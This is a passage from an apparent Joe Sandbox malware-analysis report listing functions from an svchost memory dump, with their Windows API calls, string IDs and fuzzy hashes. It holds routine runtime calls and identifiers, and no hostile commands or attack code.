                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 03E3722F
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 03E37245
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                    • Opcode ID: cbb5155528f5a7dd699de107d61d5b09b3ba6fb9aa162e446fbf0c0326b4b028
                                                                                                                                                                    • Instruction ID: 3c1523f4629d0984b433b4ae6d96438be50c8988c71521e05429f151a3e9ebdc
                                                                                                                                                                    • Opcode Fuzzy Hash: cbb5155528f5a7dd699de107d61d5b09b3ba6fb9aa162e446fbf0c0326b4b028
                                                                                                                                                                    • Instruction Fuzzy Hash: EB115EBA108304AED300F7A6CC89F9F77EC6B46600F402715B354EB0D1DA31E904CB62
                                                                                                                                                                    Function 03E38904 Relevance: 10.5, APIs: 7, Instructions: 38threadwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetForegroundWindow.USER32(00000000), ref: 03E3890F
                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 03E38915
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E38923
                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,000000FF), ref: 03E38929
                                                                                                                                                                    • SetFocus.USER32(?,00000000,03E3896A,?,00000000,?,000000FF), ref: 03E38940
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E3895E
                                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,03E38971,03E3896A,?,00000000,?,000000FF), ref: 03E38964
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Thread$AttachCurrentInputWindow$FocusForegroundProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 440050021-0
                                                                                                                                                                    • Opcode ID: 97a5b05f015d2545fdbaa4c5066f72880a4098adf0221d545ad36ad8355a1a9f
                                                                                                                                                                    • Instruction ID: f37236d34e7aade5542e2b6c436e5c32141005d5a9f8255d9afe1cd80713c6fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 97a5b05f015d2545fdbaa4c5066f72880a4098adf0221d545ad36ad8355a1a9f
                                                                                                                                                                    • Instruction Fuzzy Hash: C2F01279E04344BEDB11EBF68C1996E77ACDB4A620F525660B520EB5C0D6359910CA11
                                                                                                                                                                    Function 03E398F4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 03E398FD
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SwitchToThisWindow), ref: 03E39914
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 03E39927
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: ChangeWindowMessageFilter$SwitchToThisWindow$user32.dll
                                                                                                                                                                    • API String ID: 667068680-2021927898
                                                                                                                                                                    • Opcode ID: e0b07087b98671536b5b0a5974167c5832d19c11267e81405a5b0331923a73a5
                                                                                                                                                                    • Instruction ID: c147dba891d3fd90cba0090a9a5d85f2cc44bd22ff7f8da3b8010a8c055991db
                                                                                                                                                                    • Opcode Fuzzy Hash: e0b07087b98671536b5b0a5974167c5832d19c11267e81405a5b0331923a73a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF01CB2905308EEDB00FFBBA94D69A77F8DB01514B141695E0189B251E7B06900CB10
                                                                                                                                                                    Function 03E31ABC Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(Function_0000D5C4,00000000,03E31BB0), ref: 03E31AEB
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,03E31BB0), ref: 03E31AFD
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,03E31BB0), ref: 03E31B21
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00008000,00000000,00000000,03E31BB0), ref: 03E31B72
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(Function_0000D5C4,03E31BB7,00000000,00000000,03E31BB0), ref: 03E31BA0
                                                                                                                                                                    • RtlDeleteCriticalSection.KERNEL32(Function_0000D5C4,03E31BB7,00000000,00000000,03E31BB0), ref: 03E31BAA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3782394904-0
                                                                                                                                                                    • Opcode ID: f743af0b18dfa3ed5a23374cd2d53fc59de07804623018730f6baf2c0fec996d
                                                                                                                                                                    • Instruction ID: 3d35fc62428985e93368d40339bec51adcb72c6fc1f370d370a503e3d59f8d60
                                                                                                                                                                    • Opcode Fuzzy Hash: f743af0b18dfa3ed5a23374cd2d53fc59de07804623018730f6baf2c0fec996d
                                                                                                                                                                    • Instruction Fuzzy Hash: CC214C74A08748EFDB11FBA9D84DB9ABBF4EB0B708F146399E4009B690D6749940EF14
                                                                                                                                                                    Function 03E34ABD Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E32F6C: GetKeyboardType.USER32(00000000), ref: 03E32F71
                                                                                                                                                                      • Part of subcall function 03E32F6C: GetKeyboardType.USER32(00000001), ref: 03E32F7D
                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 03E34B23
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 03E34B37
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 03E34B48
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 03E34B84
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FBE
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FF1
                                                                                                                                                                      • Part of subcall function 03E32F9C: RegCloseKey.ADVAPI32(?,03E33014,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E33007
                                                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 03E34B64
                                                                                                                                                                      • Part of subcall function 03E349F4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,03E34A5A), ref: 03E34A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3734044017-0
                                                                                                                                                                    • Opcode ID: 53797f057a0c22b2cb5a3e06c843ef645a830fe852788c73a455ebf0b56772e8
                                                                                                                                                                    • Instruction ID: 84ca3d71978bd75236454497937b683ce17718ecdedec2366af0cedc1e414135
                                                                                                                                                                    • Opcode Fuzzy Hash: 53797f057a0c22b2cb5a3e06c843ef645a830fe852788c73a455ebf0b56772e8
                                                                                                                                                                    • Instruction Fuzzy Hash: C40180A9408399D9DB11FF73988D3DA3A61AF13744F14775D80405E399E7394145CF62
                                                                                                                                                                    Function 03E32F9C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FBE
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E32FF1
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,03E33014,00000000,?,00000004,00000000,03E3300D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 03E33007
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                    • Opcode ID: abdd756626b98141ef79555a4a9e903fb89b7fcf554bb413a63df564a6c36b09
                                                                                                                                                                    • Instruction ID: 0b51058467841b43481f4048a692edef5fe58c0adc2c92cc9826cbe294de9c68
                                                                                                                                                                    • Opcode Fuzzy Hash: abdd756626b98141ef79555a4a9e903fb89b7fcf554bb413a63df564a6c36b09
                                                                                                                                                                    • Instruction Fuzzy Hash: D201D87D900348BEDB21EBD0CD46FEDB7BCDB05B00F1002A5BA14E7580E6759510DB64
                                                                                                                                                                    Function 03E39A3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FA), ref: 03E39A63
                                                                                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,Shell_TrayWnd,0000000D,?,?,000000FA), ref: 03E39A84
                                                                                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,?,?,SysPager,00000008,00000400,00000001,?,?,Shell_TrayWnd,0000000D,?,?,000000FA), ref: 03E39AA7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$ClassName
                                                                                                                                                                    • String ID: Shell_TrayWnd$SysPager
                                                                                                                                                                    • API String ID: 3699413841-3765525915
                                                                                                                                                                    • Opcode ID: c17d1d1da51cbf3787cbf987cdfcfaff9ab4153940c553da0955b7c6d01a1480
                                                                                                                                                                    • Instruction ID: 00069a737dee63874101f19799a1c6f76ac489f8a4032fc20c6a90f7ec0dbf3e
                                                                                                                                                                    • Opcode Fuzzy Hash: c17d1d1da51cbf3787cbf987cdfcfaff9ab4153940c553da0955b7c6d01a1480
                                                                                                                                                                    • Instruction Fuzzy Hash: C901FF75A44248BADB20DBD48C46FEEB3B89B16700F045391BA55EB281D7F15A40DF51
                                                                                                                                                                    Function 03E36D1C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,03E36DB3,?,?,00000000), ref: 03E36D34
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,03E36DB3,?,?,00000000), ref: 03E36D64
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_00006C68,00000000,00000000,00000004), ref: 03E36D6F
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,03E36DB3,?,?,00000000), ref: 03E36D8D
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_00006CA4,00000000,00000000,00000003), ref: 03E36D98
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                    • Opcode ID: 5d39138ffed0c839060dd5c20a5f9f7424df2c91f11e5e54be7d0ba1c5ddcd7c
                                                                                                                                                                    • Instruction ID: c18e671fefcf49bc0f80f41af5e7b6a064c5f52ce06e6a89e98e2f41db562524
                                                                                                                                                                    • Opcode Fuzzy Hash: 5d39138ffed0c839060dd5c20a5f9f7424df2c91f11e5e54be7d0ba1c5ddcd7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 1D01D479240708BED301F6B5CC4AF6E35ACDB43B20F912760E410EF6C4D6749E00C565
                                                                                                                                                                    Function 03E36DDD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,03E36F96,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 03E36DFB
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                    • Opcode ID: 14d6f72e47e31ad80f3850b647f5c5795d0be09a12afd98d1bb5a56a5216af1d
                                                                                                                                                                    • Instruction ID: 2fb384a9f4030cdf0cf1a7b7de5609c51799bd426788a2b4cfb5c07382dd32d7
                                                                                                                                                                    • Opcode Fuzzy Hash: 14d6f72e47e31ad80f3850b647f5c5795d0be09a12afd98d1bb5a56a5216af1d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8941AF29704A056BC711EF79C8DC6FEF2B6EB87204FA43765E442AB344D725EA06C621
                                                                                                                                                                    Function 03E38270 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,03E38781,00000000,03E38794), ref: 03E38276
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 03E38287
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                    • Opcode ID: 5243a68da49ee02dec8a8eee4c44b36ac3ceca18a1e888b946e1f5c1a1aa7be9
                                                                                                                                                                    • Instruction ID: c772fcede3d97a74f2403b57cf9933309ea2282838aeba1dad66a5d82c52b219
                                                                                                                                                                    • Opcode Fuzzy Hash: 5243a68da49ee02dec8a8eee4c44b36ac3ceca18a1e888b946e1f5c1a1aa7be9
                                                                                                                                                                    • Instruction Fuzzy Hash: 44D05EB220979A4EDB00EAA7D8CCB9621689F4B104B313324F43479141EA74C4ACCA00
                                                                                                                                                                    Function 03E37000 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: b3074ffe284d91f638c87374c6f4ffbe122223c615cfe0f3de58067210485ebd
                                                                                                                                                                    • Instruction ID: 6e16f87477f7161afbbd5de9e1da26f42304bf98b05db50a54c1d7656fc6333c
                                                                                                                                                                    • Opcode Fuzzy Hash: b3074ffe284d91f638c87374c6f4ffbe122223c615cfe0f3de58067210485ebd
                                                                                                                                                                    • Instruction Fuzzy Hash: 1141FEB5A0025C9FDB21EB69CC88BDEB7F9AB0A304F4452E5A508EB241D7749F84CF51
                                                                                                                                                                    Function 03E36FFE Relevance: 6.1, APIs: 4, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3990497365-0
                                                                                                                                                                    • Opcode ID: c6005ed739661d01dea6441276eca1a3294f204f60782bacfa3415bf0da49b01
                                                                                                                                                                    • Instruction ID: e9c791cc88252ee74d97494cb11d79ca95c7573d2605a7727a1b0ddca8fdf16e
                                                                                                                                                                    • Opcode Fuzzy Hash: c6005ed739661d01dea6441276eca1a3294f204f60782bacfa3415bf0da49b01
                                                                                                                                                                    • Instruction Fuzzy Hash: 09411DB5A0025C9FDB21EB69CC88BDEB7F9AB0A204F4452E5A508EB241D7749F84CF51
                                                                                                                                                                    Function 03E37D24 Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStringTypeA.KERNEL32(00000809,00000002,?,00000080,?), ref: 03E37E1E
                                                                                                                                                                    • GetThreadLocale.KERNEL32 ref: 03E37D4E
                                                                                                                                                                      • Part of subcall function 03E37CAC: GetCPInfo.KERNEL32(00000000,?), ref: 03E37CC5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocaleStringThreadType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1505017576-0
                                                                                                                                                                    • Opcode ID: c70e154ea09bcc56bd44360409151a74330964548f19a32559b5f9b660e9ee15
                                                                                                                                                                    • Instruction ID: 8a3635915a1a97aaf4e60be28f549a06e74f8ee2f72af26dfd71c7dd739c9626
                                                                                                                                                                    • Opcode Fuzzy Hash: c70e154ea09bcc56bd44360409151a74330964548f19a32559b5f9b660e9ee15
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F3107A15013A8DAD722EB77AC0D3A777F8EB83208F485359D5848F2C5DB354844CB61
                                                                                                                                                                    Function 03E39238 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 03E39266
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?), ref: 03E39273
                                                                                                                                                                    • GetModuleHandleExA.KERNEL32(00000006,03E39238,?,00000000,?), ref: 03E39283
                                                                                                                                                                    • GetLastError.KERNEL32(00000006,03E39238,?,00000000,?), ref: 03E392A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002D.00000002.20494636228.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002D.00000002.20494595217.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494679961.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002D.00000002.20494734991.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_45_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$HandleModule
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1090667551-0
                                                                                                                                                                    • Opcode ID: 2487f92d6b94e1f8fe7daf521ec0e26ce1a6626155e602586cd1e3c906f4f952
                                                                                                                                                                    • Instruction ID: 1177c059057d9c621da7baba1877315f62e829791363815a48b1181736406eb0
